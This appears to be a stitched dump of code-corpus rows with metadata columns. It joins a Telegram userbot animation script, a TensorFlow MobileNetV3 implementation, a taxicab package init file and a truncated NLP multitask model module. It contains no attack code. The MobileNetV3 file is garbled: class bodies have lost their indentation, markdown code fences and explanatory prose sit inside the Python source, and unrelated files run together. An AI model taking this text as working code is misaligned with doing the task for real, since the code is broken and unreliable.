"⬤⬤⬤ 81% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:02** ▰▰▱▱▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤⬤ 81% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:03** ▰▰▰▱▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀ [Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:04** ▰▰▰▰▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:05** ▰▰▰▰▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:06** ▰▰▰▰▰▰▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:07** ▰▰▰▰▰▰▰▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:08** ▰▰▰▰▰▰▰▰▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:09** ▰▰▰▰▰▰▰▰▰▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:10** ▰▰▰▰▰▰▰▰▰▰ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏺️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**"
    ]
    for i in animation_ttl:
        await asyncio.sleep(animation_interval)
        await event.edit(animation_chars[i % 11])
@borg.on(admin_cmd(pattern=f"squ$",outgoing=True))
async def _(event):
    if event.fwd_from:
        return
    await event.edit("╔═══════════════════╗ \n \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n \t░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ \t░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(1)
    await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
    await asyncio.sleep(6)
] | 1 | 2021-04-15T09:17:18.000Z | 2021-04-15T09:17:18.000Z | import tensorflow as tf
from defs import BlockArgs, GlobalParams
from module import hardSigmoid, hardSwish
from ops import *
class V3Block(object):
"""A class of MobileNetV3 Inverted Residual Bottleneck."""
def __init__(self, block_args, global_params):
"""
Args:
block_args: BlockArgs, arguments to create a V3 block.
global_params: GlobalParams, a set of global parameters.
"""
self._block_args = block_args
self._batch_norm_momentum = global_params.batch_norm_momentum
self._batch_norm_epsilon = global_params.batch_norm_epsilon
if global_params.data_format == 'channels_first':
self._channel_axis = 1
self._spatial_dims = [2, 3]
else:
self._channel_axis = -1
self._spatial_dims = [1, 2]
self.has_se = (self._block_args.se_ratio is not None) and (
self._block_args.se_ratio > 0) and (self._block_args.se_ratio <= 1)
self.nonlinearity = hardSwish if block_args.nonlinearity == 'HS' else tf.nn.relu6
self.endpoints = None
# Builds the block accordings to arguments.
self._build()
    def _build(self):
        """Builds the V3 block according to the arguments."""
        filters = self._block_args.hidden_filters
        # Expansion phase:
        self._expand_conv = tf.keras.layers.Conv2D(
            filters,
            kernel_size=[1, 1],
            strides=[1, 1],
            kernel_initializer=conv_kernel_initializer,
            padding='same',
            use_bias=False)
        self._bn0 = tf.layers.BatchNormalization(
            axis=self._channel_axis,
            momentum=self._batch_norm_momentum,
            epsilon=self._batch_norm_epsilon,
            fused=True)
        kernel_size = self._block_args.kernel_size
        # Depth-wise convolution phase:
        self._depthwise_conv = tf.keras.layers.DepthwiseConv2D(
            [kernel_size, kernel_size],
            strides=self._block_args.strides,
            depthwise_initializer=conv_kernel_initializer,
            padding='same',
            use_bias=False)
        self._bn1 = tf.layers.BatchNormalization(
            axis=self._channel_axis,
            momentum=self._batch_norm_momentum,
            epsilon=self._batch_norm_epsilon,
            fused=True)
        if self.has_se:
            num_reduced_filters = max(
                1, int(self._block_args.input_filters * self._block_args.se_ratio))
            # Squeeze and Excitation layer.
            self._se_reduce = tf.keras.layers.Conv2D(
                num_reduced_filters,
                kernel_size=[1, 1],
                strides=[1, 1],
                kernel_initializer=conv_kernel_initializer,
                padding='same',
                use_bias=True)
            self._se_expand = tf.keras.layers.Conv2D(
                filters,
                kernel_size=[1, 1],
                strides=[1, 1],
                kernel_initializer=conv_kernel_initializer,
                padding='same',
                use_bias=True)
        # Output phase:
        filters = self._block_args.output_filters
        self._project_conv = tf.keras.layers.Conv2D(
            filters,
            kernel_size=[1, 1],
            strides=[1, 1],
            kernel_initializer=conv_kernel_initializer,
            padding='same',
            use_bias=False)
        self._bn2 = tf.layers.BatchNormalization(
            axis=self._channel_axis,
            momentum=self._batch_norm_momentum,
            epsilon=self._batch_norm_epsilon,
            fused=True)
    def _call_se(self, input_tensor):
        """Calls the Squeeze and Excitation layer.

        Args:
            input_tensor: Tensor, a single input tensor for the Squeeze/Excitation layer.

        Returns:
            An output tensor with the same shape as the input.
        """
        se_tensor = tf.reduce_mean(
            input_tensor, self._spatial_dims, keepdims=True)
        se_tensor = self._se_expand(tf.nn.relu6(self._se_reduce(se_tensor)))
        tf.logging.info('Built Squeeze and Excitation with tensor shape: %s' %
                        (se_tensor.shape))
        return hardSigmoid(se_tensor) * input_tensor
    def call(self, inputs, training=True):
        """Implementation of Block call().

        Args:
            inputs: the inputs tensor.
            training: boolean, whether the model is constructed for training.

        Returns:
            An output tensor.
        """
        tf.logging.info('Block input: %s shape: %s' %
                        (inputs.name, inputs.shape))
        x = self.nonlinearity(
            self._bn0(self._expand_conv(inputs), training=training))
        tf.logging.info('Expand: %s shape: %s' % (x.name, x.shape))
        x = self.nonlinearity(self._bn1(self._depthwise_conv(x), training=training))
        tf.logging.info('DWConv: %s shape: %s' % (x.name, x.shape))
        if self.has_se:
            with tf.variable_scope('se'):
                x = self._call_se(x)
        self.endpoints = {'expansion_output': x}
        x = self._bn2(self._project_conv(x), training=training)
        # Identity op. `strides` may be an int or an [h, w] pair after
        # _replace() in _build, so check both forms; the original
        # `strides == 1` test never matched the [1, 1] case.
        if self._block_args.id_skip:
            strides = self._block_args.strides
            all_unit_strides = strides == 1 or (
                isinstance(strides, (list, tuple)) and all(s == 1 for s in strides))
            if all_unit_strides and self._block_args.input_filters == self._block_args.output_filters:
                x = tf.add(x, inputs)
        tf.logging.info('Project: %s shape: %s' % (x.name, x.shape))
        return x
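# `V3Block` uses the `hardSwish` and `hardSigmoid` activations imported from
# `module`. Assuming they follow the MobileNetV3 paper's piecewise-linear
# definitions (the real ops act element-wise on tensors), a scalar sketch:

```python
def relu6(x):
    # Clamp to [0, 6], matching tf.nn.relu6 for a scalar input.
    return min(max(x, 0.0), 6.0)

def hard_sigmoid(x):
    # MobileNetV3 hard-sigmoid: relu6(x + 3) / 6.
    return relu6(x + 3.0) / 6.0

def hard_swish(x):
    # MobileNetV3 hard-swish: x * relu6(x + 3) / 6.
    return x * hard_sigmoid(x)
```

# Both are cheap piecewise approximations of sigmoid and swish chosen for
# quantization-friendly inference on mobile hardware.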
class MobileNetV3Small(tf.keras.Model):
"""Implements tf.keras.Model for MobileNetV3Small."""
def __init__(self, global_params=None):
"""
Args:
lobal_params: GlobalParams, a set of global parameters.
Raises:
ValueError: when blocks_args is not specified as a list.
"""
super().__init__()
self._blocks_args = \
[BlockArgs(3, 1, 16, 16, 16, True, 2, 0.25, 'RE'),
BlockArgs(3, 1, 16, 72, 24, True, 2, None, 'RE'),
BlockArgs(3, 1, 24, 88, 24, True, 1, None, 'RE'),
BlockArgs(5, 1, 24, 96, 40, True, 2, 0.25, 'HS'),
BlockArgs(5, 1, 40, 240, 40, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 40, 240, 40, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 40, 120, 48, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 48, 144, 48, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 48, 288, 96, True, 2, 0.25, 'HS'),
BlockArgs(5, 1, 96, 576, 96, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 96, 576, 96, True, 1, 0.25, 'HS')
]
self._global_params = global_params
self.endpoints = None
self._build()
    def _build(self):
        """Builds a model."""
        self._blocks = []
        # Builds blocks.
        for block_args in self._blocks_args:
            assert block_args.num_repeat > 0
            # Update block input and output filters based on depth multiplier.
            block_args = block_args._replace(
                input_filters=round_filters(block_args.input_filters,
                                            self._global_params),
                output_filters=round_filters(block_args.output_filters,
                                             self._global_params))
            # The first block needs to take care of stride and filter size increase.
            self._blocks.append(V3Block(block_args, self._global_params))
            if block_args.num_repeat > 1:
                # pylint: disable=protected-access
                block_args = block_args._replace(
                    input_filters=block_args.output_filters, strides=[1, 1])
                # pylint: enable=protected-access
            for _ in range(block_args.num_repeat - 1):
                self._blocks.append(V3Block(block_args, self._global_params))
        batch_norm_momentum = self._global_params.batch_norm_momentum
        batch_norm_epsilon = self._global_params.batch_norm_epsilon
        if self._global_params.data_format == 'channels_first':
            channel_axis = 1
        else:
            channel_axis = -1
        # Stem part.
        self._conv_stem = tf.keras.layers.Conv2D(
            filters=round_filters(16, self._global_params),
            kernel_size=[3, 3],
            strides=[2, 2],
            kernel_initializer=conv_kernel_initializer,
            padding='same',
            use_bias=False)
        self._bn0 = tf.layers.BatchNormalization(
            axis=channel_axis,
            momentum=batch_norm_momentum,
            epsilon=batch_norm_epsilon,
            fused=True)
        # Head part.
        self._conv_expand = tf.keras.layers.Conv2D(
            filters=576,
            kernel_size=[1, 1],
            strides=[1, 1],
            kernel_initializer=conv_kernel_initializer,
            padding='same',
            use_bias=False)
        self._bn1 = tf.layers.BatchNormalization(
            axis=channel_axis,
            momentum=batch_norm_momentum,
            epsilon=batch_norm_epsilon,
            fused=True)
        self._avg_pooling = tf.keras.layers.AveragePooling2D(
            pool_size=[7, 7],
            data_format=self._global_params.data_format)
        self._conv_head = tf.keras.layers.Conv2D(
            filters=1280,
            kernel_size=[1, 1],
            strides=[1, 1],
            kernel_initializer=conv_kernel_initializer,
            padding='same',
            use_bias=False)
        self._final = tf.keras.layers.Conv2D(
            filters=self._global_params.num_classes,
            kernel_size=[1, 1],
            strides=[1, 1],
            kernel_initializer=conv_kernel_initializer,
            padding='same',
            use_bias=False)
        if self._global_params.dropout_rate > 0:
            self._dropout = tf.keras.layers.Dropout(
                self._global_params.dropout_rate)
        else:
            self._dropout = None
    def call(self, inputs, training=True):
        """Implementation of MobileNetV3 call().

        Args:
            inputs: input tensors.
            training: boolean, whether the model is constructed for training.

        Returns:
            output tensors.
        """
        outputs = None
        self.endpoints = {}
        # Calls Stem layers.
        with tf.variable_scope('v3_stem'):
            outputs = hardSwish(
                self._bn0(self._conv_stem(inputs), training=training))
        tf.logging.info('Built stem layers with output shape: %s' %
                        outputs.shape)
        self.endpoints['stem'] = outputs
        # Calls blocks.
        for idx, block in enumerate(self._blocks):
            with tf.variable_scope('v3_blocks_%s' % idx):
                outputs = block.call(outputs, training=training)
                self.endpoints['block_%s' % idx] = outputs
                if block.endpoints:
                    for k, v in block.endpoints.items():
                        self.endpoints['block_%s/%s' % (idx, k)] = v
        # Calls final layers and returns logits.
        with tf.variable_scope('v3_head'):
            outputs = hardSwish(
                self._bn1(self._conv_expand(outputs), training=training))
            outputs = self._avg_pooling(outputs)
            outputs = hardSwish(self._conv_head(outputs))
            if self._dropout:
                outputs = self._dropout(outputs, training=training)
            outputs = tf.reshape(self._final(outputs), [-1, self._global_params.num_classes])
            self.endpoints['head'] = outputs
        return outputs
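# `round_filters`, imported from `ops`, scales a channel count by the depth
# multiplier carried in GlobalParams; its body is not shown in this file. A
# standalone EfficientNet-style sketch of what such a helper typically does
# (an assumption about its implementation, with the multiplier passed
# directly instead of via GlobalParams):

```python
def round_filters(filters, multiplier=1.0, divisor=8, min_depth=None):
    """Round a channel count after scaling by a width multiplier.

    Rounds to the nearest multiple of `divisor` (hardware-friendly
    channel counts), never dropping more than 10% below the scaled value.
    """
    if not multiplier:
        return filters
    filters *= multiplier
    min_depth = min_depth or divisor
    new_filters = max(min_depth, int(filters + divisor / 2) // divisor * divisor)
    # Make sure rounding down does not shrink channels by more than 10%.
    if new_filters < 0.9 * filters:
        new_filters += divisor
    return int(new_filters)
```

# For example, a 1.5x multiplier takes the 16-channel stem to 24 channels
# while keeping the result a multiple of 8.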
class MobileNetV3Large(tf.keras.Model):
"""Implements tf.keras.Model for MobileNetV3Large."""
def __init__(self, global_params=None):
"""
Args:
lobal_params: GlobalParams, a set of global parameters.
Raises:
ValueError: when blocks_args is not specified as a list.
"""
super().__init__()
self._blocks_args = \
[BlockArgs(3, 1, 16, 16, 16, True, 1, None, 'RE'),
BlockArgs(3, 1, 16, 64, 24, True, 2, None, 'RE'),
BlockArgs(3, 1, 24, 72, 24, True, 1, None, 'RE'),
BlockArgs(5, 1, 24, 72, 40, True, 2, 0.25, 'RE'),
BlockArgs(5, 1, 40, 120, 40, True, 1, 0.25, 'RE'),
BlockArgs(5, 1, 40, 120, 40, True, 1, 0.25, 'RE'),
BlockArgs(3, 1, 40, 240, 80, True, 2, None, 'HS'),
BlockArgs(3, 1, 80, 200, 80, True, 1, None, 'HS'),
BlockArgs(3, 1, 80, 184, 80, True, 1, None, 'HS'),
BlockArgs(3, 1, 80, 184, 80, True, 1, None, 'HS'),
BlockArgs(3, 1, 80, 480, 112, True, 1, 0.25, 'HS'),
BlockArgs(3, 1, 112, 672, 112, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 112, 672, 160, True, 2, 0.25, 'HS'),
BlockArgs(5, 1, 160, 960, 160, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 160, 960, 160, True, 1, 0.25, 'HS')
]
self._global_params = global_params
self.endpoints = None
self._build()
def _build(self):
"""Builds a model."""
self._blocks = []
# Builds blocks.
for block_args in self._blocks_args:
assert block_args.num_repeat > 0
# Update block input and output filters based on depth multiplier.
block_args = block_args._replace(
input_filters=round_filters(block_args.input_filters,
self._global_params),
output_filters=round_filters(block_args.output_filters,
self._global_params))
# The first block needs to take care of stride and filter size increase.
self._blocks.append(V3Block(block_args, self._global_params))
if block_args.num_repeat > 1:
# pylint: disable=protected-access
block_args = block_args._replace(
input_filters=block_args.output_filters, strides=[1, 1])
# pylint: enable=protected-access
for _ in range(block_args.num_repeat - 1):
self._blocks.append(V3Block(block_args, self._global_params))
batch_norm_momentum = self._global_params.batch_norm_momentum
batch_norm_epsilon = self._global_params.batch_norm_epsilon
if self._global_params.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
# Stem part.
self._conv_stem = tf.keras.layers.Conv2D(
filters=round_filters(16, self._global_params),
kernel_size=[3, 3],
strides=[2, 2],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._bn0 = tf.layers.BatchNormalization(
axis=channel_axis,
momentum=batch_norm_momentum,
epsilon=batch_norm_epsilon,
fused=True)
# Head part.
self._conv_expand = tf.keras.layers.Conv2D(
filters=960,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._bn1 = tf.layers.BatchNormalization(
axis=channel_axis,
momentum=batch_norm_momentum,
epsilon=batch_norm_epsilon,
fused=True)
self._avg_pooling = tf.keras.layers.AveragePooling2D(
pool_size=[7, 7],
data_format=self._global_params.data_format)
self._conv_head = tf.keras.layers.Conv2D(
filters=1280,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._final = tf.keras.layers.Conv2D(
filters=self._global_params.num_classes,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
if self._global_params.dropout_rate > 0:
self._dropout = tf.keras.layers.Dropout(
self._global_params.dropout_rate)
else:
self._dropout = None
def call(self, inputs, training=True):
"""Implementation of MobileNetV3 call().
Args:
inputs: input tensors.
training: boolean, whether the model is constructed for training.
Returns:
output tensors.
"""
outputs = None
self.endpoints = {}
# Calls Stem layers
with tf.variable_scope('v3_stem'):
outputs = hardSwish(
self._bn0(self._conv_stem(inputs), training=training))
tf.logging.info('Built stem layers with output shape: %s' %
outputs.shape)
self.endpoints['stem'] = outputs
# Calls blocks.
for idx, block in enumerate(self._blocks):
with tf.variable_scope('v3_blocks_%s' % idx):
outputs = block.call(outputs, training=training)
self.endpoints['block_%s' % idx] = outputs
if block.endpoints:
for k, v in block.endpoints.items():
self.endpoints['block_%s/%s' % (idx, k)] = v
# Calls final layers and returns logits.
with tf.variable_scope('v3_head'):
outputs = hardSwish(
self._bn1(self._conv_expand(outputs), training=training))
outputs = self._avg_pooling(outputs)
outputs = hardSwish(self._conv_head(outputs))
if self._dropout:
outputs = self._dropout(outputs, training=training)
outputs = tf.reshape(self._final(outputs), [-1, self._global_params.num_classes])
self.endpoints['head'] = outputs
return outputs | 40.463964 | 117 | 0.567405 | 2,066 | 17,966 | 4.692159 | 0.107938 | 0.04085 | 0.049515 | 0.042913 | 0.824634 | 0.810605 | 0.779554 | 0.760883 | 0.737054 | 0.726326 | 0 | 0.03827 | 0.329511 | 17,966 | 444 | 118 | 40.463964 | 0.766479 | 0.115774 | 0 | 0.753799 | 0 | 0 | 0.031375 | 0 | 0 | 0 | 0 | 0 | 0.006079 | 1 | 0.030395 | false | 0 | 0.012158 | 0 | 0.06383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
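The stem and head in the `call()` methods above wrap their convolutions in `hardSwish`. As a hedged, framework-free sketch (the file's actual `hardSwish` is defined elsewhere and operates on tensors), the MobileNetV3 hard-swish activation is x * ReLU6(x + 3) / 6:

```python
def relu6(x):
    # ReLU capped at 6, common in mobile architectures.
    return max(0.0, min(6.0, x))

def hard_swish(x):
    # MobileNetV3 hard-swish: x * ReLU6(x + 3) / 6,
    # a cheap piecewise approximation of the swish activation.
    return x * relu6(x + 3.0) / 6.0
```

For |x| >= 3 it coincides with 0 (left) or the identity (right), which is what makes it inexpensive on mobile hardware.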
8cd072bf4003a6fd4f6062acafc04792266b1923 | 83 | py | Python | taxicab/__init__.py | nathanrooy/taxicab | 8d473b4b4350d0adeff7c0696c378525d39b131e | [
"MIT"
] | 11 | 2021-04-19T16:55:29.000Z | 2022-03-03T10:58:57.000Z | taxicab/__init__.py | nathanrooy/taxicab | 8d473b4b4350d0adeff7c0696c378525d39b131e | [
"MIT"
] | 7 | 2021-02-21T20:42:28.000Z | 2022-01-20T11:54:59.000Z | taxicab/__init__.py | nathanrooy/taxicab | 8d473b4b4350d0adeff7c0696c378525d39b131e | [
"MIT"
] | 2 | 2021-07-27T12:12:12.000Z | 2021-12-15T16:49:50.000Z | from ._about import __version__
from ._about import __author__
from ._api import *
| 20.75 | 31 | 0.807229 | 11 | 83 | 5.090909 | 0.545455 | 0.321429 | 0.535714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144578 | 83 | 3 | 32 | 27.666667 | 0.788732 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5080d1881a3e3f6afe2b820f53be6a86a30fc891 | 31,060 | py | Python | mtnlpmodel/core.py | xiaomihao/mtnlpmodel | ff97acd5e37d12dca931b425e8d1d5b2054ab019 | [
"Apache-2.0"
] | 3 | 2020-06-24T09:03:05.000Z | 2021-11-04T05:34:09.000Z | build/lib/mtnlpmodel/core.py | xiaomihao/mtnlpmodel | ff97acd5e37d12dca931b425e8d1d5b2054ab019 | [
"Apache-2.0"
] | 11 | 2020-09-26T01:14:53.000Z | 2022-03-12T00:36:47.000Z | mtnlpmodel/core.py | xiaomihao/mtnlpmodel | ff97acd5e37d12dca931b425e8d1d5b2054ab019 | [
"Apache-2.0"
] | 1 | 2020-06-29T01:47:41.000Z | 2020-06-29T01:47:41.000Z | import os
import tensorflow as tf
from tensorflow.keras import Input
from tensorflow.keras.models import Model
from tensorflow.keras.layers import (Embedding,
Flatten,
Dropout,
Dense,
Lambda,
Bidirectional,
LSTM,
LayerNormalization,)
from tf_crf_layer.layer import CRF
from tf_attention_layer.layers.global_attentioin_layer import GlobalAttentionLayer
from mtnlpmodel.utils.model_util import Mish
def cls_branch_single_input(arcloss_param, output_dims, feature_extractor, emb_layer, outputlayer_name='cls'):
if arcloss_param: # for arc-softmax loss
from mtnlpmodel.utils.model_util import ArcFace
with tf.keras.backend.name_scope("CLS_branch"):
# cls branch
cls_feature_layer = feature_extractor(emb_layer)
cls_flat_lstm = Flatten()(cls_feature_layer)
cls_flat = Dropout(0.25)(cls_flat_lstm)
cls_vec_layer = Dense(128, name='arc_vector', activation='linear')
cls_vector = cls_vec_layer(cls_flat)
cls_vector = Mish()(cls_vector)
cls_layer = ArcFace(output_dims, margin=0.2, name=outputlayer_name)
cls_arc = cls_layer(cls_vector)
cls_output = cls_arc
# ner cls branch
ner_cls_layer = cls_arc
else: # for softmax loss
with tf.keras.backend.name_scope("CLS_branch"):
# cls branch
cls_feature_layer = feature_extractor(emb_layer)
cls_flat_lstm = Flatten()(cls_feature_layer)
cls_flat = Dropout(0.25)(cls_flat_lstm)
cls_dense = Dense(output_dims, activation='softmax', name=outputlayer_name)
cls_output = cls_dense(cls_flat)
cls_vector = cls_output
# ner cls branch
ner_cls_layer = cls_vector
return ner_cls_layer, cls_output, cls_vector, cls_feature_layer
def cls_branch(arcloss_param, output_dims, feature_extractor, cls_emb_layer, ner_emb_layer=None, outputlayer_name='cls'):
if arcloss_param: # for arc-softmax loss
from mtnlpmodel.utils.model_util import ArcFace
with tf.keras.backend.name_scope("CLS_branch"):
# cls branch
cls_feature_layer = feature_extractor(cls_emb_layer)
cls_flat_lstm = Flatten()(cls_feature_layer)
cls_flat = Dropout(0.25)(cls_flat_lstm)
cls_vec_layer = Dense(128, name='arc_vector', activation='linear')
cls_vector = cls_vec_layer(cls_flat)
cls_vector = Mish()(cls_vector)
cls_layer = ArcFace(output_dims, margin=0.2, name=outputlayer_name)
cls_arc = cls_layer(cls_vector)
cls_output = cls_arc
# ner cls branch
if ner_emb_layer is not None:
ner_cls_feature_layer = feature_extractor(ner_emb_layer)
ner_cls_flat_lstm = Flatten()(ner_cls_feature_layer)
ner_cls_vec_layer = cls_vec_layer(ner_cls_flat_lstm)
ner_cls_layer = cls_layer(ner_cls_vec_layer)
else:
ner_cls_layer = None
else: # for softmax loss
with tf.keras.backend.name_scope("CLS_branch"):
# cls branch
cls_feature_layer = feature_extractor(cls_emb_layer)
cls_flat_lstm = Flatten()(cls_feature_layer)
cls_flat = Dropout(0.25)(cls_flat_lstm)
cls_dense = Dense(output_dims, activation='softmax', name=outputlayer_name)
cls_output = cls_dense(cls_flat)
cls_vector = cls_output
# ner cls branch
if ner_emb_layer is not None:
ner_cls_feature_layer = feature_extractor(ner_emb_layer)
ner_cls_flat_lstm = Flatten()(ner_cls_feature_layer)
ner_cls_layer = cls_dense(ner_cls_flat_lstm)
else:
ner_cls_layer = None
return ner_cls_layer, cls_output, cls_vector
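When `hyperparams['Arcloss']` is set, the branches above route the 128-d class vector through an `ArcFace` layer with `margin=0.2`. As a rough scalar illustration (not the TF layer's implementation, which works on batched tensors and one-hot targets), the additive angular margin lowers the target-class logit by widening its angle:

```python
import math

def arc_margin_logit(cos_theta, margin=0.2):
    # Additive angular margin: replace cos(theta) with cos(theta + m)
    # for the target class, making it harder to score high and thereby
    # enlarging the angular gaps between classes.
    theta = math.acos(max(-1.0, min(1.0, cos_theta)))
    return math.cos(theta + margin)
```

With `margin=0` this reduces to the plain cosine logit; a positive margin always yields a smaller value for the same angle.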
def build_model_single_input(model_choice, **hyperparams):
